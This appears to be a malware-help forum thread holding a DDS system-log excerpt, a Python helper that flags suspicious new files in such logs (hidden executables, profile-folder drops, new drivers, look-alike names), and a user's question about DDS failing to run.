2016-12-09 09:20:32 172544 ----a-w- C:\WINDOWS\System32\DeviceEnroller.exe
2016-12-09 09:20:05 187392 ----a-w- C:\WINDOWS\System32\mdmregistration.dll
2016-12-09 09:19:46 433664 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
2016-12-09 09:19:45 1121280 ----a-w- C:\WINDOWS\System32\aadtb.dll
2016-12-09 09:19:43 261120 ----a-w- C:\WINDOWS\System32\Windows.UI.Core.TextInput.dll
2016-12-09 09:19:32 85504 ----a-w- C:\WINDOWS\System32\EditBufferTestHook.dll
2016-12-09 09:19:32 119296 ----a-w- C:\WINDOWS\System32\InputLocaleManager.dll
.
============= FINISH: 11:52:20.38 ===============

Attached Files
File Type: txt attach.txt (11.8 KB)
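An added triage aid for logs like the one above (example code written for this page; it is not part of the original post and not part of the DDS tool). It parses "Created Last 30" entries (timestamp, size or "--------" for a directory, the 8-character attribute field, path) and flags the things a helper looks for first: hidden executables, executables dropped under a user profile or ProgramData, new kernel drivers, and names containing non-ASCII or look-alike characters. It also groups entries written within a short window, since an installer or dropper shows up as a tight burst of files rather than as isolated entries. Only the attribute letters visible in this log are interpreted ('d' directory, 'h' hidden, 'a' archive, 'w' writable); that reading is an assumption based on the log itself, and the remaining positions are kept verbatim. The sample input is a handful of lines copied from the list above.

```python
r"""Triage helper for the "Created Last 30" section of a DDS-style log.

Each entry has the shape

    2017-01-07 23:19:46 909944 ----a-w- C:\WINDOWS\System32\drivers\NetUtils2016.sys
    2017-01-07 23:36:53 -------- d-----w- C:\ProgramData\AppalmaaZ

Attribute letters interpreted here (assumed from the log): 'd' directory,
'h' hidden, 'a' archive, 'w' writable.  Other positions are kept verbatim.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import List

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<size>\d+|-{8})\s+"
    r"(?P<attr>[a-z-]{8})\s+"
    r"(?P<path>\S.*?)\s*$"
)
PE_EXT = (".exe", ".dll", ".sys", ".scr", ".cpl")
PROFILE_MARKERS = ("\\appdata\\", "\\programdata\\", "\\temp\\")


@dataclass
class Entry:
    ts: datetime
    size: int            # -1 for directories
    attr: str            # raw 8-char attribute field, e.g. "---h--w-"
    path: str
    reasons: List[str] = field(default_factory=list)

    @property
    def is_dir(self) -> bool:
        return self.attr[0] == "d"

    @property
    def hidden(self) -> bool:
        return "h" in self.attr

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1]


def parse(text: str) -> List[Entry]:
    """Return the entries found in text; lines that are not entries are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        size = -1 if m["size"].startswith("-") else int(m["size"])
        out.append(Entry(datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                         size, m["attr"], m["path"]))
    return out


def triage(entries: List[Entry]) -> List[Entry]:
    """Attach heuristic reasons to entries worth a closer look and return those."""
    flagged = []
    for e in entries:
        e.reasons = []
        low = e.path.lower()
        if not e.is_dir and low.endswith(PE_EXT):
            if e.hidden:
                e.reasons.append("hidden executable")
            if any(mk in low for mk in PROFILE_MARKERS):
                e.reasons.append("executable dropped under a user profile or ProgramData")
            if low.endswith(".sys"):
                e.reasons.append("new kernel driver: verify publisher/signature")
        # '?' is not a legal NTFS file-name character, so a '?' in the name means a
        # non-ASCII (look-alike) character that was mangled on its way into the log.
        if "?" in e.name or any(ord(c) > 127 for c in e.name):
            e.reasons.append("non-ASCII or look-alike characters in name")
        if e.reasons:
            flagged.append(e)
    return flagged


def bursts(entries: List[Entry], window_seconds: int = 120,
           min_items: int = 3) -> List[List[Entry]]:
    """Group entries written within window_seconds of each other, oldest first.

    DDS lists newest first; an installer or dropper shows up as a tight cluster.
    """
    ordered = sorted(entries, key=lambda e: e.ts)
    clusters, current = [], []
    for e in ordered:
        if current and (e.ts - current[-1].ts).total_seconds() > window_seconds:
            clusters.append(current)
            current = []
        current.append(e)
    if current:
        clusters.append(current)
    return [c for c in clusters if len(c) >= min_items]


# Sample input: lines copied from the "Created Last 30" section of the log above.
SAMPLE_LOG = r"""
2017-01-07 23:20:25 1938538 ----a-w- C:\Users\King\AppData\Roaming\Fixcore.bin
2017-01-07 23:20:10 629760 ----a-w- C:\Users\King\AppData\Roaming\RedKayphase.exe
2017-01-07 23:19:47 -------- d-----w- C:\WINDOWS\System32\sstmp
2017-01-07 23:19:46 909944 ----a-w- C:\WINDOWS\System32\drivers\NetUtils2016.sys
2017-01-07 23:19:46 470592 ----a-w- C:\WINDOWS\SysWow64\NetUtils2016.exe
2017-01-07 23:18:42 825536 ---h--w- C:\Program Files (x86)\Internet Explorer\i??pl?r?.b?t.exe
2016-12-21 18:15:36 42096 ----a-w- C:\WINDOWS\System32\DbxSvc.exe
2016-12-15 02:56:59 -------- d---a-w- C:\Program Files\iTunes
"""

if __name__ == "__main__":
    entries = parse(SAMPLE_LOG)
    for e in triage(entries):
        print(f"{e.ts:%Y-%m-%d %H:%M:%S}  {e.path}\n    -> " + "; ".join(e.reasons))
    for group in bursts(entries):
        print(f"\nburst of {len(group)} items between {group[0].ts} and {group[-1].ts}")
```

These rules are triage hints, not verdicts: a new .sys under System32\drivers is routine after a Windows or vendor update (the Dropbox drivers in the same list are an example), so the point of the driver rule is to check the file's publisher and signature, not to delete it. The burst grouping is what separates one installer's worth of files from unrelated background activity.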

Trying to run DDS

When I try to run DDS under the 'first steps' link, running as admin, it says "program not meant to run in compatibility mode, program shall now exit". When I check the properties, it says for type of file: screensaver (.scr) and description: DDS (Doesn't do squat), which is really strange. I need a computer checkup please.